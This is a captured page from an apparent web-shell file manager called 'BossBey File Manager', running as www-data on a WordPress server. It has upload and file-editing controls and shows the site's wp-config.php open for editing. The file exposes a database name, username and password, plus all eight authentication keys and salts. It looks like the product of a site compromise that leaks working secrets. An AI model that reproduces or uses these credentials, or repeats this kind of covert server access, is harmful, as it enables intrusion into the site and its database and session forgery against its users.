BossBey File Manager
PHP:
7.3.31-1~deb10u1
OS:
Linux
User:
www-data
Root
/
home
/
www
/
inorg
/
anniversary
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'headsmeeting' ); /** Database username */ define( 'DB_USER', 'headsmeeting_admin' ); /** Database password */ define( 'DB_PASSWORD', 'dsgfhsfgjhdfgjdfgjdfjdhg' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '!}=9opV]EZ|9{?WDl{yZKLgdi,|pm$*Fwp3Sft D>p*3XE#|r~iESF$o>KQ i: L' ); define( 'SECURE_AUTH_KEY', 'Csb){E/.q3;Caoq7t`QVDXYMqAv9f#!_UR647v`H`1!^@1{Xp<OiyOkZ UmIb$&f' ); define( 'LOGGED_IN_KEY', '}C`-hl@4+b5j4|qM(_;jF*UL-85xO#E4fCnxonafhC&{+=+^]p`51pIdhj[G#3J]' ); define( 'NONCE_KEY', 'LbrtKqQcQ;%CQ<bOY#N]j=HNr7>2~0$XV.<[gT<JQS5n4?wUKocd`H8_<x4()5QF' ); define( 'AUTH_SALT', 'MN41wr} qlfySoWje3IF9sxqJL!`3<(x&l^XAwrwuGys?O(%;VMwhl;+fNX0f`*^' ); define( 'SECURE_AUTH_SALT', 'CED<oaFZ^yY*m3gqsCi6UVHUQOzZIZCXT3-wH CxX{Ka+=%ry+}31?JwUzJlguUE' ); define( 'LOGGED_IN_SALT', 'kz6NMmzeA76[m8AI;4~[><vV]Fm[eb,?7?9.&9m)GRKEY%4XP`O6@$lq=[ncB cl' ); define( 'NONCE_SALT', 'V5_B-|e_wpKxtuE6K3gmh0sGy-*}d8x^gS4:.Ga H`o0][$2My:Zj!FE5NjSP(9m' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; define('FS_METHOD', 'direct');
Save
Cancel